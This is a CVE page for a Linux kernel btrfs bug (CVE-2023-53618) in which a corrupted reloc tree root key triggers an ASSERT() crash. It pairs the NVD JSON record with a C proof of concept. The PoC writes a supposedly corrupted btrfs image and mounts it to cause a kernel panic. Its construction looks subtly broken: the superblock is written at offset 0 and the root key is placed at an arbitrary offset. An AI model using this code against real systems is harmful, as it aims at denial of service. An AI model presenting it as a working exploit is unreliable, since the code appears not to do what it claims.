CVE-2023-53618

// PoC for CVE-2023-53618 - Trigger btrfs ASSERT() via corrupted reloc tree root key // This PoC simulates the conditions that trigger the vulnerability #include <stdio.h> #include <stdlib.h> #include <string.h> #include <fcntl.h> #include <unistd.h> #include <sys/ioctl.h> #include <linux/fs.h> // Simulate creating a corrupted btrfs filesystem image // with invalid reloc tree root key for a non-subvolume tree int create_corrupted_btrfs_image(const char *path) { int fd = open(path, O_RDWR | O_CREAT, 0644); if (fd < 0) { perror("open"); return -1; } // Create a minimal btrfs superblock unsigned char superblock[4096] = {0}; // Set magic number "_BHRfS_M" superblock[0x40] = '_'; superblock[0x41] = 'B'; superblock[0x42] = 'H'; superblock[0x43] = 'R'; superblock[0x44] = 'f'; superblock[0x45] = 'S'; superblock[0x46] = '_'; superblock[0x47] = 'M'; // Write corrupted reloc tree root key // ObjectID = TREE_RELOC_OBJECTID (-8) // Type = ROOT_ITEM (132) // Offset = QUOTA_TREE_OBJECTID (8) - this is invalid for reloc tree unsigned long long *root_key = (unsigned long long *)(superblock + 0xB0); root_key[0] = (unsigned long long)-8; // TREE_RELOC_OBJECTID root_key[1] = 132; // ROOT_ITEM type root_key[2] = 8; // QUOTA_TREE_OBJECTID (invalid) write(fd, superblock, sizeof(superblock)); close(fd); return 0; } int main(int argc, char *argv[]) { const char *image_path = "/tmp/corrupted_btrfs.img"; printf("Creating corrupted btrfs image...\n"); if (create_corrupted_btrfs_image(image_path) < 0) { return 1; } printf("Attempting to mount corrupted btrfs image...\n"); // Mount the image to trigger the ASSERT() in prepare_to_merge() // This will cause kernel panic / oops with stack dump if (mount(image_path, "/mnt/test", "btrfs", 0, NULL) < 0) { perror("mount"); printf("Note: Direct mount may require loop device setup\n"); } return 0; }

{"cve": {"id": "CVE-2023-53618", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-07T16:15:44.297", "lastModified": "2026-02-05T14:58:43.870", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: reject invalid reloc tree root keys with stack dump\n\n[BUG]\nSyzbot reported a crash that an ASSERT() got triggered inside\nprepare_to_merge().\n\nThat ASSERT() makes sure the reloc tree is properly pointed back by its\nsubvolume tree.\n\n[CAUSE]\nAfter more debugging output, it turns out we had an invalid reloc tree:\n\n BTRFS error (device loop1): reloc tree mismatch, root 8 has no reloc root, expect reloc root key (-8, 132, 8) gen 17\n\nNote the above root key is (TREE_RELOC_OBJECTID, ROOT_ITEM,\nQUOTA_TREE_OBJECTID), meaning it's a reloc tree for quota tree.\n\nBut reloc trees can only exist for subvolumes, as for non-subvolume\ntrees, we just COW the involved tree block, no need to create a reloc\ntree since those tree blocks won't be shared with other trees.\n\nOnly subvolumes tree can share tree blocks with other trees (thus they\nhave BTRFS_ROOT_SHAREABLE flag).\n\nThus this new debug output proves my previous assumption that corrupted\non-disk data can trigger that ASSERT().\n\n[FIX]\nBesides the dedicated fix and the graceful exit, also let tree-checker to\ncheck such root keys, to make sure reloc trees can only exist for subvolumes."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.2.19", "versionEndExcluding": "5.3", "matchCriteriaId": "48875F15-B129-4684-8556-4EAD32A9586F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.3.4", "versionEndExcluding": "5.15.127", "matchCriteriaId": "96E6BF19-FB03-4C7D-B953-056D6BAD2410"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.46", "matchCriteriaId": "D8B8CC90-9492-465C-81D4-10DA3B712286"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.4.11", "matchCriteriaId": "C36FD9E6-B6D7-4887-8F08-C1F64E139D5C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.5:rc1:*:*:*:*:*:*", "matchCriteriaId": "0B3E6E4D-E24E-4630-B00C-8C9901C597B0"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.5:rc2:*:*:*:*:*:*", "matchCriteriaId": "E4A01A71-0F09-4DB2-A02F-7EFFBE27C98D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.5:rc3:*:*:*:*:*:*", "matchCriteriaId": "F5608371-157A-4318-8A2E-4104C3467EA1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.5:rc4:*:*:*:*:*:*", "matchCriteriaId": "2226A776-DF8C-49E0-A030-0A7853BB018A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.5:rc5:*:*:*:*:*:*", "matchCriteriaId": "6F15C659-DF06-455A-9765-0E6DE920F29A"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/314135b7bae9618a317874ae195272682cf2d5d4", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/3ae93b316ca4b8b3c33798ef1d210355f2fb9318", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/6ebcd021c92b8e4b904552e4d87283032100796d", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/84256e00eeca73c529fc6196e478cc89b8098157", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}